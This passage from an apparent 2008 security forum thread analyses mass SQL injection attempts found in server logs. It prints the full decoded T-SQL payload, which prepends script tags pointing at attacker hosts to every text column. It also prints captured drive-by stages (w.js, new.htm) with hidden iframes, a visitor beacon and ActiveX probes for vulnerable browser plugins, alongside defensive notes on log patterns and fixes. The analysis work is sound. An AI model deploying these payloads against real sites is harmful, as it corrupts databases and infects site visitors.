-- the statement itself is as posted.
-- What the batch does, as written:
--   1. Opens a cursor over sysobjects joined to syscolumns, limited to user tables (a.xtype='u')
--      and to columns whose xtype is 99, 35, 231 or 167 (SQL Server's ntext, text, nvarchar, varchar).
--   2. For every table/column pair, runs a dynamic UPDATE that puts the string
--      "></title><script src=...></script><!-- in front of the stored value, for rows whose
--      value does not match the LIKE pattern.
-- Review points for a defender:
--   * The request in the log entry was answered with 403, i.e. it was refused on this server.
--   * The entry point is a query-string value concatenated into SQL (note the ' after t=28980);
--     parameterised queries remove it, and a database login without UPDATE rights on unrelated
--     tables limits the damage.
--   * Log patterns to search for: DECLARE%20@S, CAST(0x, EXEC(@S) inside a GET query string.
--   * On a database that was hit, search text columns for the script tag named in the statement.
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Looks as though the site is no longer available.
Quote
[www3.ss11qn.cn]
Error getting IP Address:
No such host is known.

Quote
Retrieving DNS records for www3.ss11qn.cn...

Attempt to get a DNS server for www3.ss11qn.cn failed: www3.ss11qn.cn does not exist in the DNS
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment

October 12, 2008, 01:39:55 pm
Reply #110

Orac

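New site; we had a total of 44 different attempts involving this one in the overnight logs. (Per the wget output below, www2.s800qn.cn resolves to 121.11.76.85, the same address www3.ss11qn.cn resolved to in Reply #106.)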

Log entry
Code: [Select]
xxx.xxx.xxx.xxx - - [11/Oct/2008:14:03:14 +0000] "GET /forum/viewtopic.php?f=11&t=35291';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwareremoval.com) "-"

Decoded
Code: [Select]
-- [analyst note] Decoded payload of the 11/Oct/2008 request. Lines starting with "--" were added
-- for review; the statement itself is as posted.
-- Same structure as the earlier samples in this thread: a cursor over user tables (a.xtype='u')
-- and their text-type columns (xtype 99, 35, 231, 167 = ntext, text, nvarchar, varchar), and a
-- dynamic UPDATE per column that puts a script tag in front of the stored value.
-- What changed is the host in the script tag: www2.s800qn.cn/csrss/w.js.
-- The logged request was answered with 403. Useful log patterns are DECLARE%20@S, CAST( and
-- EXEC(@S) inside a GET query string; the underlying fix is parameterised queries plus a
-- database login that cannot UPDATE arbitrary tables.
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


Code: [Select]
--14:08:09--  http://www2.s800qn.cn/csrss/w.js
           => `w.js'
Resolving www2.s800qn.cn... 121.11.76.85
Connecting to www2.s800qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
// [analyst note] Captured copy of w.js as served from www2.s800qn.cn. Apart
// from the host name in the two new.htm iframes, the code is the same as the
// www3.ss11qn.cn copy posted in Reply #106; the counter id (419214144) and the
// cookie names (cck_lasttime, cck_count) are unchanged. Comments marked
// [analyst note] were added for review; every other line is the sample as posted.

// [analyst note] Error handler: on any script error it writes a zero-size
// iframe pointing at new.htm and returns true, which suppresses the browser's
// script-error notification.
window.onerror=function()
{

document.write("<iframe  width=0 height=0 src=http://www2.s800qn.cn/csrss/new.htm></iframe>");

return true;
}

// [analyst note] Run-once guard: the body executes only while js2eus is still undefined.
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

// [analyst note] Visitor beacon: referrer, page URL, colour depth, screen
// resolution, the cc_k() visit counter, system language and user agent are
// appended to a counter URL and sent through a zero-size iframe.
var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

// [analyst note] Next stage: the same new.htm iframe the error handler writes.
document.write("<iframe  width=0 height=0 src=http://www2.s800qn.cn/csrss/new.htm></iframe>");

}

// [analyst note] y_gVal(iz): returns the slice of document.cookie from offset
// iz up to the next ";" (or to the end of the string when there is none).
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
// [analyst note] y_g(name): scans document.cookie for "name=" and returns its
// value through y_gVal(); returns null when the cookie is not present.
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
// [analyst note] cc_k(): returning-visitor counter kept in the cookies
// cck_lasttime and cck_count. Returns 0 on the first visit; afterwards it
// increments the count only when more than yesvisitor (1000*36000 ms, i.e.
// 10 hours) has passed since cck_lasttime, and returns the count.
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Code: [Select]
--14:11:17--  http://www2.s800qn.cn/csrss/new.htm
           => `new.htm'
Resolving www2.s800qn.cn... 121.11.76.85
Connecting to www2.s800qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]

<!-- [analyst note] Captured copy of new.htm as served from www2.s800qn.cn.
     Comments marked [analyst note] were added for review; all other lines are the sample as posted. -->
<!-- [analyst note] NOTE(review): the Sym* functions in the first and last script blocks look like the
     pop-up blocking shim that Symantec/Norton client software inserts into fetched pages. They are
     probably an artefact of the capturing machine rather than content served by www2.s800qn.cn;
     confirm against a capture taken without that software. -->
<script language="JavaScript">
<!--

// [analyst note] Returns true for every script error, which hides the error from the user.
function SymError()
{
  return true;
}

window.onerror = SymError;

// [analyst note] Keeps the real window.open so the last script block can restore it on load.
var SymRealWinOpen = window.open;

// [analyst note] Stub that replaces window.open while the page loads: opens nothing, returns an empty object.
function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<!-- [analyst note] Third-party visit counter (cnzz.com, id 1084964). -->
<script src="http://s46.cnzz.com/stat.php?id=1084964&web_id=1084964" language="JavaScript" charset="gb2312"></script>
<SCRIPT>
// [analyst note] Four zero-height iframes written unconditionally: flash.htm, ani.htm, cx.htm, mi.htm.
// The contents of those pages are not shown in the post.
document.write("<iframe width=50 height=0 src=flash.htm></iframe>");
document.write("<iframe width=50 height=0 src=ani.htm></iframe>");
document.write("<iframe width=100 height=0 src=cx.htm></iframe>");
document.write("<iframe width=100 height=0 src=mi.htm></iframe>");
// [analyst note] Sets the status-bar text to a word meaning "Done" and silences script errors;
// presumably so the page looks as if it has finished loading normally.
window.status="完成";
window.onerror=function(){return true;}
// [analyst note] 06014.htm is written only when the user agent does not contain "msie 7".
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=06014.htm></iframe>");
// [analyst note] Two ActiveX presence probes: "snpvw.Snapshot Viewer Control.1" gates ff.htm and
// "DPClient.Vod" gates xl.htm. The frame is written when the variable named in catch() does not
// compare equal to "[object Error]" afterwards.
// NOTE(review): this relies on the catch variable remaining visible after the catch block, and the
// stray ";" between catch and finally would be a syntax error in a standards-compliant parser.
// Whether the browsers this page was aimed at ran the block as written is not shown here; confirm
// in an isolated analysis environment.
try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=ff.htm></iframe>");}}
try{var w;
var ml=new ActiveXObject("DPClient.Vod");}
catch(w){};                     
finally{if(w!="[object Error]"){document.write("<iframe width=100 height=0 src=xl.htm></iframe>");}}
// [analyst note] test(): builds the ProgID "IERPCtl.IERPCtl.1" from string fragments, returns
// silently when the control cannot be created, otherwise reads its PRODUCTVERSION property and
// writes real10.htm for values that compare <= "6.0.14.552" and real11.htm for anything else.
// The comparison is a string comparison, not a numeric version comparison. The earlier new.htm in
// Reply #106 wrote both real pages without this check. rrooxx, Like and vvvvv are undeclared globals.
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real10.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=real11.htm></iframe>");
}
test();
</SCRIPT>
<!-- [analyst note] The capture has closing HEAD and HTML tags here with no matching opening tags above. -->
</HEAD>
</HTML>
<!-- [analyst note] One more unconditional frame (tr.htm), then a 51.la counter (id 2204425). -->
<iframe width=50 height=0 src=tr.htm></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/2204425.js"></script>
<script language="JavaScript">
<!--
// [analyst note] Closing half of the Sym* shim (see the NOTE(review) at the top of this listing):
// chains the page's own onload/onunload handlers, restores the real window.open once the page
// has loaded and re-installs the stub on unload.
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


Code: [Select]
--14:14:26--  http://js.users.51.la/2204425.js
           => `2204425.js'
Resolving js.users.51.la... 121.11.69.211
Connecting to js.users.51.la[121.11.69.211]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
// Body returned for the counter script: it writes a linked badge image.
// The link target carries the counter id (2204425). The entity-encoded alt
// text decodes to "51.la 专业、免费、强健的访问统计"
// ("51.la professional, free, robust visit statistics").
document.write ('<a href="http://www.51.la/?2204425" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_7.gif" style="border:none" /></a>\n');


Code: [Select]
--14:18:32--  http://www.51.la/?2204425
           => `?2204425'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<style type="text/css">
body,td,p {font-size:12px;line-height:120%;font-family:宋体;word-break: break-all}
input {font: 14px "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif;;padding:4px;vertical-align:middle;border:1px solid #CCCCCC;background:#fff;}
p {line-height:17px;text-align:left;margin:6px 0px}
a {color: #000000;text-decoration: none;}
a:hover {color: #1562BF;text-decoration: none}
.a1 {color: #1562BF;text-decoration: none;}
.a1:hover {color: #000;text-decoration: none;}
img {border:none;vertical-align:middle;}
div {text-align:left}
.left {float: left;}
.right {float: right;}
.fonts {color:#1562BF}
.vcode {border: 1px solid #3C67BF;background:#DDE8FC;vertical-align: text-bottom;padding:6px;}
#allbody {width:760px;margin: 0 auto}
.form {padding:9px 0px 9px 20px;margin:0px;}
#iright {padding:9px;width:237px;margin-right:4px;border:1px solid #999;background:#F3F3F3;filter: Alpha(Opacity=92, FinishOpacity=2); opacity:0.92;}
.btlogin {border:none;background:url('images/index_bt_login.gif');width:81px;height:33px;}
#it123 {margin:12px 0px;}
#it123 p {line-height:17px;color:#666}
#bottom  {float: left;width:760px;height:62px;text-align: center;margin-top:3px;padding:20px 0px 0px 0px;background:url('../images/bottom_bg.gif')}
#userlogin {height:270px;width:100%;}
#guestin {height:270px;width:100%;}
</style>
<title>大牛X统计报告 - “我要啦”提供</title>
</head>
<body style="margin-top:12px">
<div id="allbody">
 <div id="tops" style="width:760px;height:55px">
  <div class="left"><img src="images/index_logo.gif" alt="我要啦免费网站访问统计系统" /></div>
  <div class="right"><p style="text-align:right;padding:0px;margin:0px">
   <a href="http://old.51.la/" class="a1">怀念旧版</a>
   | <a href="reg.asp">免费申请</a>
   | <a href="login.asp">登录</a>

   | <a href="http://bbs.51.la/" target="_blank">站长交流大厅</a>
   | <a href="http://top.51.la/" target="_blank">排行榜</a>
   | <a href="news.asp">日志</a>
   | <a href="http://help.51.la/">帮助</a></p>
  <p style="text-align:right;padding:2px 0px 0px 0px;margin:0px;color:red"><img src="images/index_zhuyi.gif" alt="注意" /> 注意: 您已经离开刚才访问的网站 ,进入了 51.La 免费统计服务网站</p>
  </div>
 </div>
 <div id="bodys" style="width:760px;height:auto;overflow:hidden;background:url('images/index_show.jpg') no-repeat 0px 25px">
  <!--右侧内容-->
  <div class="right" id="iright">
   <div id="userlogin" style="display:none">
   <img src="images/index_rtext_login.gif" alt="我要啦用户登录" />
   <form id="f1" action="login.asp" method="post" class="form">
<p>用户名 <input name="uname" id="uname" style="width:140px" /></p>
<p>密 码 <input type="password" name="upass" id="upass" style="width:140px" /></p>
<p>验证码 <input name="vcode" id="vcode" style="width:45px" /> 请输入 <span class="vcode"><img alt="验证码" src="user/vcode.asp" style="height:10px;width:40px" /></span></p>
<p>
<input type="submit" value=" &nbsp; " class="btlogin" /> &nbsp;&nbsp;
<a href="reg.asp"><img src="images/index_bt_reg.gif" alt="免费注册" /></a>
</p>
<p style="padding:9px 0px 6px 0px;text-indent: -3px;"><input type="checkbox" name="remb" value="yes" style="border:none;background:#F3F3F3;" />记住这个身份(共用电脑者慎用)</p>
<p><a href="usergetpass.asp" class="a1">忘记了密码?</a>
    <br /><a href="about.asp" class="a1">深入了解我要啦免费统计……</a>
<br />
</p>
   </form>
   </div>

   <div id="guestin">
   <img src="images/index_rtext_report.gif" alt="查看用户统计报表" />
    <div class="form">

<!-- Viewing gate for the statistics report of counter id 2204425, registered
     under the site name 大牛X. The visible text says the report is not public
     and asks for a separate viewing password, so the hit counts collected by
     this counter cannot be read from this page without that password. -->
<form target="_top" action="report/0_help.asp" method="post" style="padding:0px;margin:0px">
  <p class="fonts">用户网站【大牛X】</p>
  <p>报表未公开<br />请输入独立查看密码以打开报表</p>
  <input type="hidden" name="id" value="2204425" />
  <input type="hidden" name="t" value="chalogin" />
  <p>查看权密码 <input name="lookpass" type="password" size="14" /></p>
  <p style="padding:5px 0px 12px 0px;"><input type="submit" value=" &nbsp; " class="btlogin" /></p>
</form>
    <p><a href="http://help.51.la/faq/#17" target="_blank" class="a1">什么是独立查看密码?</a></p>

    <p><a href="#" onclick="document.getElementById('userlogin').style.display='';document.getElementById('guestin').style.display='none';return false;" class="a1">切换到用户登录界面
</p>
</div>
   </div>

   <img src="images/index_rtext_reg.gif" alt="免费注册我要啦用户" />
   <div class="form">
    <p><a href="reg.asp"><img src="images/index_regnow.gif" alt="立即免费申请" /></a><br /><a href="report/1_main.asp?id=1" class="a1">观看功能演示</a>
    </p>
   </div>
  </div>
  <!--左侧内容-->
  <div class="left" style="width:492px">
   <div style="height:17px;padding-top:8px"><img src="images/index_loveme.gif" alt="中文站长必备工具" /></div>
   <div><img src="images/index_showtop.jpg" alt="封面" usemap="#Map" /></div>
   <map name="Map"><area shape="rect" coords="320,120,425,143" href="report/1_main.asp?id=1" alt="点击观看功能演示" target="_blank"></map>
   <div id="it123">
    <table>
<tr><td style="width:50px;text-align:center;"><img src="images/index_1.gif" alt="您真的了解您的站点吗?" /><br /><br /><br /></td><td><img src="images/index_1b.gif" alt="您真的了解您的站点吗?" /><p>每天有多少人访问您的网站? 现在有谁正在您的网站上? 他们做了什么?<br />他们从何而来? 搜索引擎为您带来多少点击? 访问者搜索的关键词是什么?<br />您的哪个栏目哪个网页更受欢迎? ……</p></td></tr>
<tr><td style="width:50px;text-align:center;"><img src="images/index_2.gif" alt="我要啦免费统计就是您智明的眼睛!" /><br /><br /><br /></td><td><img src="images/index_2b.gif" alt="我要啦免费统计就是您智明的眼睛!" /><p>成熟、完善、人性化的功能设计,符合并引导着中文站长使用习惯。<br />有了我要啦免费统计,您的问题将迎刃而解!<br /><br /></p></td></tr>
<tr><td style="width:50px;text-align:center;"><img src="images/index_3.gif" alt="知名的站长社区" /><br /><br /><br /></td><td><img src="images/index_3b.gif" alt="知名的站长社区" /><p>畅游我要啦站长交流大厅,结识热情、友善、成熟的互连网同行,<br />您的视野会更加开阔,站点建设和推广将更加得心应手。<br /><br /></p></td></tr>
</table>
   </div>
  </div>
 </div>

 <div style="width:760px;text-align: center;margin-bottom:18px;float: left;">
  <a href="http://www.firstdh.com/reg.php" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_firstdh.gif" /></a>
  <a href="http://www.15ai.com/spltb.html" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_15ai.gif" /></a>
  <a href="http://www.kaikai8.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_kaikai8.gif" /></a>
  <a href="http://www.9v.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_9v.gif" /></a>
  <a href="http://www.leledh.com/add.asp" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_leledh.gif" /></a>
  <a href="http://www.jjoobb.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_jjoobb.gif" /></a>
</div>

 <!--版权栏-->
 <div style="float: left;width:760px;text-align:center;margin-top:0px">
 <a class="a1" href="/rule.asp">用户守则</a>
 | <a class="a1" href="/usergetpass.asp">找回密码</a>
 | <a class="a1" href="/friend.asp">广告联系</a>
 | <a class="a1" href="/users.asp">典型用户</a>
 | <a class="a1" href="/contact.asp">联系我们</a>
 | <a class="a1" href="/about.asp">关于我们</a>
 </div>
 <div id="bottom">
 服务器及带宽由 <a href="http://www.zitian.cn/" target="_blank">紫田网络(Zitian.CN)</a> 提供<br />
 我要啦免费统计 Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> 版权所有 2002-2008 豫ICP备05009218号<br />
 
<script language="JavaScript">
<!--

// NOTE(review): the Sym* identifiers match the pop-up blocking script that
// Symantec/Norton desktop security products insert into HTML responses. This
// block is most likely an artifact of the capturing machine, not part of the
// page served by 51.la - confirm before treating it as an indicator.

// Error handler that reports every script error as handled.
function SymError()
{
  return true;
}

window.onerror = SymError;

// Keep the browser's real window.open so it can be restored later.
var SymRealWinOpen = window.open;

// Replacement for window.open: ignores its arguments, opens nothing and
// returns an empty object.
function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script type="text/javascript" src="http://js.users.51.la/5.js"></script>
 <noscript><a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript>
 </div>
</div>
</body>
</html>


<script language="JavaScript">
<!--
// NOTE(review): the Sym* identifiers match the pop-up blocking script that
// Symantec/Norton desktop security products insert into HTML responses. This
// trailer after the closing html tag is most likely an artifact of the
// capturing machine, not content served by the site - confirm.

// Saved copies of the page's own onload / onunload handlers.
var SymRealOnLoad;
var SymRealOnUnload;

// On unload: reinstall the SymWinOpen stub as window.open, then chain to the
// page's original unload handler if one was saved.
function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

// On load: run the page's original onload handler, restore window.open from
// SymRealWinOpen, and hook onunload while keeping the previous handler.
function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

// Install the hook: remember the existing onload and replace it.
SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment

October 14, 2008, 03:55:19 pm
Reply #111

JohnC
